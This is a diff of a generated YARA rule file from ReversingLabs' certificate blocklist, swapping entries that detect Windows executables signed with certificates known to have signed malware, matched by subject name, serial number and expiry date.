@@ -29477,21 +51871,21 @@ rule REVERSINGLABS_Cert_Blocklist_04A0E92B0B9Ebbb797Df6Ef52Bd5Ad05 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "04:a0:e9:2b:0b:9e:bb:b7:97:df:6e:f5:2b:d5:ad:05" and 1479081600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sunshine.com" and pe.signatures [ i ] . serial == "03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4458df2d-82c2-5377-9746-101c2de52913"
+		id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16872-L16888"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L10990-L11006"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "2c6673f6821c4ba11fc015cf3e9edefeb7c45209bc9dcd18501c4681444a9b9e"
+		logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29501,21 +51895,21 @@ rule REVERSINGLABS_Cert_Blocklist_25F222Ab2613Dc4270B2Aabc2519A101 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Aeroscan TOV" and pe.signatures [ i ] . serial == "25:f2:22:ab:26:13:dc:42:70:b2:aa:bc:25:19:a1:01" and 1445299200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ok.com" and pe.signatures [ i ] . serial == "04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b433cddc-25c3-5627-99b5-ff9bc7fa73ed"
+		id = "a5ac5da6-0bb0-5327-ac3a-b53d2f103fe6"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16890-L16906"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11008-L11026"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "23ab2343b17dce74fb4166a690ca5dd300b3ed20d3a6b43b922f456410d3035d"
+		logic_hash = "0077b9c46ddd98a4929878ba4ba9476ed7fb1d7bf6e30c3ae0f950445d01e8f3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29525,21 +51919,21 @@ rule REVERSINGLABS_Cert_Blocklist_212Ca239866F88C3D5B000B3004A569C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "XECURE LAB CO., LTD." and pe.signatures [ i ] . serial == "21:2c:a2:39:86:6f:88:c3:d5:b0:00:b3:00:4a:56:9c" and 1347840000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPIDER DEVELOPMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:db:c0:3c:a7:e6:ae:6d:b6" or pe.signatures [ i ] . serial == "db:c0:3c:a7:e6:ae:6d:b6" ) and 1600826873 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_7D27332C3Cb3A382A4Fd232C5C66A2 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8d1a98aa-a895-5e79-905c-760166352d4f"
+		id = "d8390528-ff27-514d-ab89-fd563a19ce3c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16908-L16924"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11028-L11044"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "e201498acfd9afebc68321887a806bb5c1d74c64a7cd93530feae2a944bd30fa"
+		logic_hash = "c1c50015db7f97b530819b40e2578463a6021bfff8e2582858a4c3fbd1a9b9bc"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29549,21 +51943,21 @@ rule REVERSINGLABS_Cert_Blocklist_18B700A319Aa98Ae71B279D4E8030B82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Yu Bao" and pe.signatures [ i ] . serial == "18:b7:00:a3:19:aa:98:ae:71:b2:79:d4:e8:03:0b:82" and 1479686400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "MALVINA RECRUITMENT LIMITED" and pe.signatures [ i ] . serial == "7d:27:33:2c:3c:b3:a3:82:a4:fd:23:2c:5c:66:a2" and 1655424000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_82D224323Efa65060B641F51Fadfef02 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "56653f72-39af-50e7-9908-e516f9b21084"
+		id = "166949cf-dbff-5713-950e-46d1f3edc61f"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16926-L16942"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11046-L11064"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1584e39b4e2025611bcb7bbbd92b97d25d12ddbb1e5c282db87730a03f7f56b1"
+		logic_hash = "9d361c91ed24b6c20a7b35957e26f208ce8e0a3d79c5a6fed6278acd826ccf49"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29573,21 +51967,21 @@ rule REVERSINGLABS_Cert_Blocklist_169138A86954Be1D9B264F47 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIG JOURNEY TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "16:91:38:a8:69:54:be:1d:9b:26:4f:47" and 1477636474 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAVAS INVESTMENTS PTY LTD" and ( pe.signatures [ i ] . serial == "00:82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" or pe.signatures [ i ] . serial == "82:d2:24:32:3e:fa:65:06:0b:64:1f:51:fa:df:ef:02" ) and 1665100800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_890570B6B0E2868A53Be3F8F904A88Ee : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "db2ae33e-d3af-5200-ad15-824e29434e2c"
+		id = "681d233c-d5a2-5f25-bdb9-125149a291c4"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16944-L16960"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11066-L11084"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d634af0637c3349fe1718ee807b8a75007ab46b141494331901a22ce54e9fc5d"
+		logic_hash = "fb7af8ec09da2fecaaaed8c7770966f11ef8a44a131553a9d1412387db2fb7ea"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29597,21 +51991,21 @@ rule REVERSINGLABS_Cert_Blocklist_33412168Eeb3C0E4C7Dd0508A9Ffecd5 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beijing Caiyunshidai Technology Co., Ltd." and pe.signatures [ i ] . serial == "33:41:21:68:ee:b3:c0:e4:c7:dd:05:08:a9:ff:ec:d5" and 1467590400 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JESEN LESS d.o.o." and ( pe.signatures [ i ] . serial == "00:89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" or pe.signatures [ i ] . serial == "89:05:70:b6:b0:e2:86:8a:53:be:3f:8f:90:4a:88:ee" ) and 1636588800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_2642Fe865F7566Ce3123A5142C207094 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "002e344e-a073-5d00-9488-d73fad51c66a"
+		id = "508d9c00-c209-55b2-9a40-b62ff4d866c9"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16962-L16978"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11086-L11102"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "7366e5064a9a9f66260730575327e404eadea096ba3f6cf28c83c47bef9bca58"
+		logic_hash = "1ad4adf8b05a6cc065d289e6963480d37a92712a318744a30a16aad22380f238"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29621,21 +52015,21 @@ rule REVERSINGLABS_Cert_Blocklist_422Ab71Ac7Fb125Ad7171B0C99510B0E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "42:2a:b7:1a:c7:fb:12:5a:d7:17:1b:0c:99:51:0b:0e" and 1475193600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C.W.D. INSTAL LTD" and pe.signatures [ i ] . serial == "26:42:fe:86:5f:75:66:ce:31:23:a5:14:2c:20:70:94" and 1666310400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4A2E337Fff23E5B2A1321Ffde56D1759 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "53205508-568c-5356-9717-2915c8f3806c"
+		id = "e5cae614-eff1-5c3d-a7f6-c41b0a2c412e"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16980-L16996"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11104-L11120"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fa285c17b43d1acdb05888074ecb16047209ade8f7f6191274f58eca7438dadf"
+		logic_hash = "bc2df95ddf1ef3d5f83d14852e1cf6cbf4b71bfbe88fc97c2a4553e8581ddf47"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29645,21 +52039,21 @@ rule REVERSINGLABS_Cert_Blocklist_6F18946E5B773B7E32D9E7B4Fb8D434C : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "VECTOR LLC (VEKTOR, OOO)" and pe.signatures [ i ] . serial == "6f:18:94:6e:5b:77:3b:7e:32:d9:e7:b4:fb:8d:43:4c" and 1454716800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Karolina Klimowska" and pe.signatures [ i ] . serial == "4a:2e:33:7f:ff:23:e5:b2:a1:32:1f:fd:e5:6d:17:59" and 1660314070 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_92D9B92F8Cf7A1Ba8B2C025Be730C300 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "15c3551f-7b08-5e7f-a540-68b3eccac316"
+		id = "bc37efaa-9ceb-5079-999f-b3d17c585b1c"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L16998-L17014"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11122-L11140"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "1b69bf520fde5255069cf8752d5c67716e9bc297ddde1566551a563a563197ea"
+		logic_hash = "2a0be6157e589705ad19756971bd865edad2d54760d03c2e6f47a461b402ad68"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29669,21 +52063,21 @@ rule REVERSINGLABS_Cert_Blocklist_3596Dfc23B9A42C66700982250Da2906 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Open Source Developer, Song WU" and pe.signatures [ i ] . serial == "35:96:df:c2:3b:9a:42:c6:67:00:98:22:50:da:29:06" and 1397219344 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UPLagga Systems s.r.o." and ( pe.signatures [ i ] . serial == "00:92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" or pe.signatures [ i ] . serial == "92:d9:b9:2f:8c:f7:a1:ba:8b:2c:02:5b:e7:30:c3:00" ) and 1598054400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B8164F7143E1A313003Ab0C834562F1F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "07b43dd7-e8f1-5b14-a0f4-42294b5b597e"
+		id = "50d50330-4098-59dd-b2da-0714eefdfc66"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17016-L17032"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11142-L11160"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "75855e26ba4e01b56a551a006e789c6032cfb02c6f6125a9bdf8becb848db5b2"
+		logic_hash = "a42fec2e0e8d37948420f16907f39c3d502c535be98024d04a777dfbc633004d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29693,21 +52087,21 @@ rule REVERSINGLABS_Cert_Blocklist_486Bbddc8C5Ee99F051Ecaeb3F99D2A3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "48:6b:bd:dc:8c:5e:e9:9f:05:1e:ca:eb:3f:99:d2:a3" and 1473292800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ekitai Data Inc." and ( pe.signatures [ i ] . serial == "00:b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" or pe.signatures [ i ] . serial == "b8:16:4f:71:43:e1:a3:13:00:3a:b0:c8:34:56:2f:1f" ) and 1598313600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_24E4A2B3Db6Be1007B9Ddc91995Bc0C8 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "09b8b3f3-a4aa-5584-b8d0-751cc87267bf"
+		id = "8e533ebf-a124-53a9-8647-6f4b40aaa066"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17034-L17050"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11162-L11178"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "bafab986605be61d25a6764042937bc5d8c55196ea8ea9aa9360764d9681351b"
+		logic_hash = "861691ce7bae4366f3b35d01c84bb0031b54653869f52eaccf20808b1b55d2af"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29717,21 +52111,21 @@ rule REVERSINGLABS_Cert_Blocklist_11211Eea9D0D1D1A325B5Eae1B2B1951120F : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "LLC HERMES" and pe.signatures [ i ] . serial == "11:21:1e:ea:9d:0d:1d:1a:32:5b:5e:ae:1b:2b:19:51:12:0f" and 1460147212 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "0890bf55-ebd5-5b68-8047-14692a5f1ae7"
+		id = "d188c65c-ee7b-586f-95f0-8de5b506c325"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17052-L17068"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11180-L11198"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "8e1e3e7d002ce084600c5444dc9b0bad8771370cb7919a3bb5ebc899040e4cf2"
+		logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29741,21 +52135,21 @@ rule REVERSINGLABS_Cert_Blocklist_172Fea8Cb06Ffced6Bfac7F2F6B77754 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xin Zhou" and pe.signatures [ i ] . serial == "17:2f:ea:8c:b0:6f:fc:ed:6b:fa:c7:f2:f6:b7:77:54" and 1467936000 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "5c35c73e-e4f6-5707-ad91-1db7c0a0ec81"
+		id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17070-L17086"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11200-L11216"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "d232923ed962fbf4a9a30890778c2380d6c6967a693c6f77c2f558bb4347e60e"
+		logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29765,21 +52159,21 @@ rule REVERSINGLABS_Cert_Blocklist_3Ee50Bb98Fadca2D662A0920E76685A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABDULKADIR SAHIN" and pe.signatures [ i ] . serial == "3e:e5:0b:b9:8f:ad:ca:2d:66:2a:09:20:e7:66:85:a2" and 1330041600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "2009c47b-8a15-50fd-a229-5e34244ede1f"
+		id = "fe602ac3-fa34-5056-a2cc-5ae9de728559"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17088-L17104"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L11218-L11234"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "22ad68974a1c6729da369c26372ba93c25ddf68df880580c727bf2d3ee2d3a86"
+		logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -29789,21 +52183,21 @@ rule REVERSINGLABS_Cert_Blocklist_21Bfddb6A66435D1Adce2Ceb23Ed7C9A : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\\xE6\\x9D\\xA8\\xE6\\xB7\\x87\\xE6\\x99\\xBA" and pe.signatures [ i ] . serial == "21:bf:dd:b6:a6:64:35:d1:ad:ce:2c:eb:23:ed:7c:9a" and 1395297334 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5B1C3F7Bbaa91Ca49B06A5C1004Ee5Be : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_02B6656292310B84022Db5541Bc48Faf : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "b78e7f2b-8122-5df6-ad79-393db9e0498d"
+		id = "d679238f-a697-5322-815c-9986c9d24032"
 		date = "2020-08-05"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L17106-L17122"
